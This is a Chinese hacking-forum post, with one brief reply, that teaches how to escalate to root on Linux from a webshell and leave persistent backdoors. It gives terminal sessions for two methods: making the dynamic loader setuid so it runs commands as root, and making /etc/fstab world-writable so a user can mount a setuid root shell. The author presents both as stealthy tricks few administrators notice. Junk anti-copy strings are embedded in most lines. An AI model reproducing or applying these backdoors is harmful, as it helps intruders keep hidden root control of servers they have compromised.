找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3163|回复: 1
打印 上一主题 下一主题

webshell下LINUX提权+留后门

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:56:25 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
方法一:setuid的方法,其实8是很隐蔽。看看过程:2ezX-BUG-关注前沿信息安全技术研究9 S- p1 ^1 ?- w+ B

4 S$ w, I& ?/ P[root@localdomain lib]# ls -l |grep ld-linux2ezX-BUG-关注前沿信息安全技术研究
- {3 c4 g- J2 flrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
! h7 D( s8 ~2 ?  u2 ?: E/ p8 D* F7 Xlrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld-lsb.so.3 -> ld-linux.so.22ezX-BUG-关注前沿信息安全技术研究
4 K2 j) M4 a( W. C[root@localdomain lib]# chmod +s ld-linux.so.22ezX-BUG-关注前沿信息安全技术研究0 R/ m/ L6 J" q* s! p8 k: N" Y
[root@localdomain lib]# ls -l |grep ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究! F& U4 l+ v" p( `0 `
-rwsr-sr-x 1 root root 128952 2007-10-18 04:49 ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
* b1 t; q- e5 k0 `lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
  G8 O! n" ]% d( C6 f+ T[root@localdomain lib]#2ezX-BUG-关注前沿信息安全技术研究  q) J0 }4 M; `/ }4 U* N3 N1 [
我们这里给/lib/ld-linux.so.2这个文件(在FC8里,它指向ld-2.7.so这个文件)加了setuid属性。然后我们看怎么利用它。2ezX-BUG-关注前沿信息安全技术研究7 w4 z4 Q! A2 Q* T* B

0 _. Z% x& Z% q4 O& K普通用户登录,测试下权限:2ezX-BUG-关注前沿信息安全技术研究
, W& K" c5 G2 b$ n% W: o1 c; Q  T3 C" s/ M* z' o+ ?
[xiaoyu@localdomain ~]$ whoami2ezX-BUG-关注前沿信息安全技术研究- `# S4 _9 \! j2 O% h; s
xiaoyu2ezX-BUG-关注前沿信息安全技术研究+ S0 M" X8 U- i
[xiaoyu@localdomain ~]$ /lib/ld-linux.so.2 `which whoami`2ezX-BUG-关注前沿信息安全技术研究
' f6 I9 r7 C% L9 Q; t( xroot2ezX-BUG-关注前沿信息安全技术研究1 P/ r& U4 Q! Z# s( z. n0 L/ }! q
[xiaoyu@localdomain ~]$2ezX-BUG-关注前沿信息安全技术研究
. S4 [; n9 n4 f0 Z( n恩,嘿嘿 root了吧,具体怎么生成root shell,你们自己去想吧,凡事都不要点得太透,对吧。呵呵,可以肯定的一点,/lib/ld-linux.so.2 /bin/sh肯定生成不了rootshell, bash检查euid 和uid,看是否相等...OK,不多说了。2ezX-BUG-关注前沿信息安全技术研究
! A/ s& `1 L& H) ~7 T, c- ]0 `* ?. l& [( N* H# I* D4 i
方法二:2ezX-BUG-关注前沿信息安全技术研究- R; }5 c% |; A6 ~. l. G( Y8 i

, {- p! [+ I0 z看过程:2ezX-BUG-关注前沿信息安全技术研究
0 I5 Z4 X/ `  V0 x* ~& B% ?  R' C" D3 {8 q4 q: g: \* v
[root@localdomain etc]# chmod a+w /etc/fstab2ezX-BUG-关注前沿信息安全技术研究9 J) z8 C4 U  Y
[root@localdomain etc]#2ezX-BUG-关注前沿信息安全技术研究) z5 `' b1 [3 P# [6 x, ^
8 `' u5 B- g4 Z
这就留好了。此方法比较XXOXX,估计没几个管理员知道。利用方法演示下2ezX-BUG-关注前沿信息安全技术研究8 g0 E7 n. w2 A

" I  ~* Q$ @4 f' o; z" q[xiaoyu@localdomain ~]$ ls -l /etc/fstab2ezX-BUG-关注前沿信息安全技术研究
, D8 d7 F3 t! s-rw-rw-rw- 1 root root 456 2008-06-07 17:28 /etc/fstab2ezX-BUG-关注前沿信息安全技术研究9 x/ ~1 f$ }9 ?3 ?4 I- Q; t6 Y
[xiaoyu@localdomain ~]$ echo 'test /mnt ext2 user,suid,exec,loop 0 0' >> /etc/fstab2ezX-BUG-关注前沿信息安全技术研究
$ n, Z- ]6 v# Y, t/ N9 a. p8 N1 O: A0 [- `
然后从本机把一个文件到目标机器上去,这里我们命名为test2ezX-BUG-关注前沿信息安全技术研究8 Q3 q+ [8 S' p' ^  A
0 y; d, [, |  D
[xiaoyu@localdomain tmp]$ ls -l test2ezX-BUG-关注前沿信息安全技术研究
" i8 T2 A& q7 I) G5 v6 U3 s& ~-rw-rw-r-- 1 xiaoyu xiaoyu 102400 2008-04-20 02:51 test2ezX-BUG-关注前沿信息安全技术研究
) C7 O/ e0 b- V! s" i/ e[xiaoyu@localdomain tmp]$ mount test2ezX-BUG-关注前沿信息安全技术研究
* G# n( R& N/ V3 G9 v) _7 E) ][xiaoyu@localdomain tmp]$ cd /mnt2ezX-BUG-关注前沿信息安全技术研究" ~+ N- n) r( q$ K  |: U- v  K
[xiaoyu@localdomain mnt]$ ls -l2ezX-BUG-关注前沿信息安全技术研究
/ l, p* C# b6 c5 N3 o; Ttotal 182ezX-BUG-关注前沿信息安全技术研究# ^7 V0 D% n2 J. p0 n
drwx------ 2 root root 12288 2008-04-20 05:44 lost+found2ezX-BUG-关注前沿信息安全技术研究
1 [$ m0 K& l1 {' c2 u% L% Y% ?% f6 I-rwsr-sr-x 1 root root 4927 2008-04-20 05:44 root2ezX-BUG-关注前沿信息安全技术研究
7 Q0 K8 E- M6 z  {5 z2 v, y, H[xiaoyu@localdomain mnt]$ ./root2ezX-BUG-关注前沿信息安全技术研究
' Z# z/ c- L0 w1 B& @) `& N! Psh-3.2#2ezX-BUG-关注前沿信息安全技术研究1 n( j/ u( M% o" @& t6 ~9 B0 }3 A, t
看到了吧,从普通用户提升到root了。呵呵。2ezX-BUG-关注前沿信息安全技术研究9 k, |. V1 ~4 d! V, S, R" t
test这个文件baidu貌似木有上传功能撒,木办法传2ezX-BUG-关注前沿信息安全技术研究& d& b$ u; K$ t$ M5 a
" ]3 E& U+ X4 _# J
貌似可能有人说本地后门木啥鸟用,但是你要搞清楚:一个webshell里面就可以完成这一切....2ezX-BUG-关注前沿信息安全技术研究6 p0 j: `& ~, O$ k
2ezX-BUG-关注前沿信息安全技术研究
3 [7 }3 j: j, h0 j# u0 N& r) e1 o& n! h* o& O2 h5 i3 C( L- Y& G2 A0 T
回复

使用道具 举报

沙发
发表于 2013-3-13 15:10:29 | 只看该作者
谢谢分享
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表